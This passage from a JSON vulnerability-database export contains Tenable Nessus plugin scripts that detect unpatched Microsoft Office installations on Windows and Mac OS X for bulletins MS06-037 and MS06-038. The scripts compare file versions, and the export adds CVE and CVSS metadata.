script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:word\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:word_viewer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:excel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:excel_viewer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:powerpoint\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:visio\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:access\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:frontpage\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:infopath\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:onenote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:outlook\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:publisher\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:project\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n exit(0);\n}\n\n\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"audit.inc\");\n\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS06-038';\nkbs = make_list(\"917150\", \"917151\", \"917152\", \"917284\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\n\nkb = '917284';\n\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\noffice_versions = hotfix_check_office_version ();\nif ( !office_versions ) exit(0, \"Microsoft Office not found.\");\n\nrootfiles = hotfix_get_officecommonfilesdir();\nif ( ! rootfiles ) exit(1,\"Failed to get Office Common Files directory.\");\n\nlogin\t= kb_smb_login();\npass \t= kb_smb_password();\ndomain \t= kb_smb_domain();\nport = kb_smb_transport();\n\nif(! smb_session_init()) audit(AUDIT_FN_FAIL, \"smb_session_init\");\n\nshare = '';\nlastshare = '';\nvuln = FALSE;\ncheckedfiles = make_array();\nforeach ver (keys(office_versions))\n{\n if (typeof(rootfiles) == 'array') rootfile = rootfiles[ver];\n else rootfile = rootfiles;\n if (\"9.0\" >< ver)\n {\n \trootfile = hotfix_get_programfilesdir();\n \tdll = ereg_replace(pattern:\"^[A-Za-z]:(.*)\", replace:\"\\1\\Microsoft Office\\Office\\mso9.dll\", string:rootfile);\n\t}\n else if (\"10.0\" >< ver)\n {\n\t dll = ereg_replace(pattern:\"^[A-Za-z]:(.*)\", replace:\"\\1\\Microsoft Shared\\Office10\\mso.dll\", string:rootfile);\n }\n else if ( \"11.0\" >< ver)\n {\n \tdll = ereg_replace(pattern:\"^[A-Za-z]:(.*)\", replace:\"\\1\\Microsoft Shared\\Office11\\mso.dll\", string:rootfile);\n }\n else continue;\n\n if (checkedfiles[dll]) continue;\n\n share = hotfix_path2share(path:rootfile);\n\n if (share != lastshare)\n {\n NetUseDel(close:FALSE);\n r = NetUseAdd(login:login, password:pass, domain:domain, share:share);\n if ( r != 1 ) audit(AUDIT_SHARE_FAIL,share);\n }\n\n handle = CreateFile (file:dll, desired_access:GENERIC_READ, file_attributes:FILE_ATTRIBUTE_NORMAL, share_mode:FILE_SHARE_READ, create_disposition:OPEN_EXISTING);\n\n if ( ! isnull(handle) )\n {\n checkedfiles[dll] = 1;\n v = GetFileVersion(handle:handle);\n CloseFile(handle:handle);\n if ( !isnull(v) )\n {\n if (v[0] == 9 && v[1] == 0 && v[2] == 0 && v[3] < 8944)\n {\n vuln = TRUE;\n kb = '917152';\n hotfix_add_report('\\nPath : '+share-'$'+':'+dll+\n '\\nVersion : '+join(v, sep:'.')+\n '\\nShould be : 9.0.0.8944\\n',\n bulletin:bulletin, kb:kb);\n }\n else if (v[0] == 10 && v[1] == 0 && v[2] < 6804)\n {\n vuln = TRUE;\n kb = '917150';\n hotfix_add_report('\\nPath : '+share-'$'+':'+dll+\n '\\nVersion : '+join(v, sep:'.')+\n '\\nShould be : 10.0.6804.0\\n',\n bulletin:bulletin, kb:kb);\n }\n else if (v[0] == 11 && v[1] == 0 && v[2] < 8028)\n {\n vuln = TRUE;\n kb = '917151';\n hotfix_add_report('\\nPath : '+share-'$'+':'+dll+\n '\\nVersion : '+join(v, sep:'.')+\n '\\nShould be : 11.0.8028.0\\n',\n bulletin:bulletin, kb:kb);\n }\n }\n }\n}\nNetUseDel();\nif (vuln)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_warning();\n exit(0);\n}\nelse\n{\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-18T01:17:43", "description": "The remote host is running a version of Microsoft Office that is\naffected by various flaws that may allow arbitrary code to be run.\n\nTo succeed, the attacker would have to send a rogue file to a user of\nthe remote computer and have it open it with Microsoft Excel or\nanother Office application.", "edition": 12, "published": "2006-07-11T00:00:00", "title": "MS06-037 / MS06-038: Vulnerabilities in Microsoft Excel and Office Could Allow Remote Code Execution (917284 / 917285) (Mac OS X)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1308", "CVE-2006-2388", "CVE-2006-1302", "CVE-2006-3059", "CVE-2006-2389", "CVE-2006-1309", "CVE-2006-1306", "CVE-2006-1301", "CVE-2006-1318", "CVE-2006-1304", "CVE-2006-1540", "CVE-2006-1316"], "modified": "2006-07-11T00:00:00", "cpe": ["cpe:/a:microsoft:office:2001:sr1:mac_os", "cpe:/a:microsoft:office:2004::mac"], "id": "MACOSX_MS_06-037.NASL", "href": "https://www.tenable.com/plugins/nessus/22025", "sourceData": "#TRUSTED 5a25f661e5fc129c39d264e1755c2e7af4e80f602eaa52d42d190744e842b0b250b165c452a75fc9480d5b5040a9bc2075de9534328e94e7ae27beba1fca088c62d5ee7b7385c89e439986a177a36e28b4a8f961d0c01687d4639ca24b410ee5a98ee90356c89d78db71549d49b9af490faa9fe3c2c84fa1310341a4ab402f1bc66408dacaacfc9adf09ef4b823dcb512bbd32210e21dbed99d6e363d33780f2788a5769a30b93a1611dc1a27b1cecb7c9fca90fc3a56460fa0426081e146e6456778a9600c8cef69a03134cec76d7c8cb70f84df9592bbfc4ea80d1895b5a70a1f57c394c4b3e9325a6f449df80cb2335da1ca22131fb50f020a48eb0372ec986c3f3083b08a7fed6dc4e05b94098866e80c387711f17ab9342b0a8d594586443c90eb72747de91115075537c95c3d60dc0ef68287907ee6ee4d73830c00f74b5e581eabb802c3dc911450e1cbbbaec22898a1313972bd5004603c51e4ce36bc1a9baeee37c27826a090e146516a1dc8f4ee65e4c5bd7928b19233752ecb3ede17b8be713065283fd21f9820105717b6709f19373f6c4e48de2b3ff5f6cb28e0655b9b7a646f20997af3ddf9522a41587f12c9b006fa56e9f85a1572f5f6684ad7727b67bb0fa93be869be551d95e67f2521f93cf46f500921e708195e8dd2a3aa12791a3ca36306fa71f2ae9896ffcdf3ab0a6b98de988e182218cbbaef5a9\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22025);\n script_version(\"1.29\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2018/07/14\");\n\n script_cve_id(\n \"CVE-2006-1301\",\n \"CVE-2006-1302\",\n \"CVE-2006-1304\",\n \"CVE-2006-1306\",\n \"CVE-2006-1308\",\n \"CVE-2006-1309\",\n \"CVE-2006-2388\",\n \"CVE-2006-3059\",\n \"CVE-2006-1316\",\n \"CVE-2006-1318\",\n \"CVE-2006-1540\",\n \"CVE-2006-2389\"\n );\n script_bugtraq_id(\n 18422,\n 18853,\n 18885,\n 18886,\n 18888,\n 18889,\n 18890,\n 18910,\n 18911,\n 18912,\n 18938\n );\n script_xref(name:\"MSFT\", value:\"MS06-037\");\n script_xref(name:\"MSFT\", value:\"MS06-038\");\n script_xref(name:\"MSKB\", value:\"917284\");\n script_xref(name:\"MSKB\", value:\"917285\");\n\n script_name(english:\"MS06-037 / MS06-038: Vulnerabilities in Microsoft Excel and Office Could Allow Remote Code Execution (917284 / 917285) (Mac OS X)\");\n script_summary(english:\"Check for Excel 2004 and X\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"An application installed on the remote Mac OS X host is affected by\nmultiple remote code execution vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is running a version of Microsoft Office that is\naffected by various flaws that may allow arbitrary code to be run.\n\nTo succeed, the attacker would have to send a rogue file to a user of\nthe remote computer and have it open it with Microsoft Excel or\nanother Office application.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/security/bulletin/ms06-037\");\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/security/bulletin/ms06-038\");\n script_set_attribute(attribute:\"solution\", value:\"Microsoft has released a set of patches for Office for Mac OS X.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/06/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/07/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office:2001:sr1:mac_os\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office:2004::mac\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/MacOSX/packages\");\n exit(0);\n}\n\n\ninclude(\"misc_func.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"macosx_func.inc\");\n\n\n\nif(sshlib::get_support_level() >= sshlib::SSH_LIB_SUPPORTS_COMMANDS)\n enable_ssh_wrappers();\nelse disable_ssh_wrappers();\n\nuname = get_kb_item(\"Host/uname\");\nif ( egrep(pattern:\"Darwin.*\", string:uname) )\n{\n off2004 = GetCarbonVersionCmd(file:\"Microsoft Excel\", path:\"/Applications/Microsoft Office 2004\");\n offX = GetCarbonVersionCmd(file:\"Microsoft Excel\", path:\"/Applications/Microsoft Office X\");\n if ( ! islocalhost() )\n {\n ret = ssh_open_connection();\n if ( ! ret ) exit(0);\n buf = ssh_cmd(cmd:off2004);\n if ( buf !~ \"^11\" )\n buf = ssh_cmd(cmd:offX);\n ssh_close_connection();\n }\n else\n {\n buf = pread(cmd:\"/bin/bash\", argv:make_list(\"bash\", \"-c\", off2004));\n if ( buf !~ \"^11\" )\n buf = pread(cmd:\"/bin/bash\", argv:make_list(\"bash\", \"-c\", offX));\n }\n\n\n if ( buf =~ \"^(10\\.|11\\.)\" )\n\t{\n\t vers = split(buf, sep:'.', keep:FALSE);\n\t # < 10.1.7\n\t if ( int(vers[0]) == 10 && ( int(vers[1]) < 1 || ( int(vers[1]) == 1 && int(vers[2]) < 7 ) ) ) security_warning(0);\n\t else\n # < 11.2.5\n\t if ( int(vers[0]) == 11 && ( int(vers[1]) < 2 || ( int(vers[1]) == 2 && int(vers[2]) < 5 ) ) ) security_warning(0);\n\t}\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}]}
